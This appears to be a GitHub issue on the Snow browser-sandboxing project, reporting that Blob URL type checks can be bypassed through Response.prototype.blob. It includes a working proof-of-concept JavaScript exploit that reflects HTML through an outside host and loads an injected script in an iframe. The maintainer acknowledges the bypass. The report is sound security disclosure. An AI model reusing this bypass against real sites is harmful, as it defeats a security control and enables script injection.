Snow can be bypassed using the Response.prototype.blob function

[matanber]

Snow overrides the URL.createObjectURL function to only allow creation of Blob URLs if the blob type is included in a specific whitelist that Snow keeps. However, if the blob isn't an "artificial blob" (wasn't created using the Blob() constructor), this check isn't performed, and the blob URL is created regardless of the blob type. Because an attacker can get access to a non-artificial blobs with an arbitrary content and type using the Response.prototype.blob function, this can be exploited in order to create URLs for arbitrary blobs. Here is a short demo for that:

(async () => {
resp = await fetch("https://peo.si/reflect.php?h=<h1>test</h1>"
blob = await resp.blob()
console.log(URL.createObjectURL(blob))
})()

This can be then used to bypass Snow, using a PoC such as the following:

(async () => {

js_url = URL.createObjectURL(new Blob([`
    alert(origin)
`], {type: "text/javascript"}))
html = `<script src="${js_url}"></script>`
resp = await fetch("https://peo.si/reflect.php?h=" + encodeURIComponent(html))
blob = await resp.blob()
ifr = document.createElement("iframe")
document.body.appendChild(ifr)
ifr.src = URL.createObjectURL(blob)

})()

[weizman]

Hi @matanber , please see https://github.com/LavaMoat/snow/issues/158#issuecomment-2094736819

[weizman]

And as for this specific bypass - good one.

I remember realizing this can be done at some point after merging the original solution, so I can't say I'm surprised.

But I think it's clever to see that :)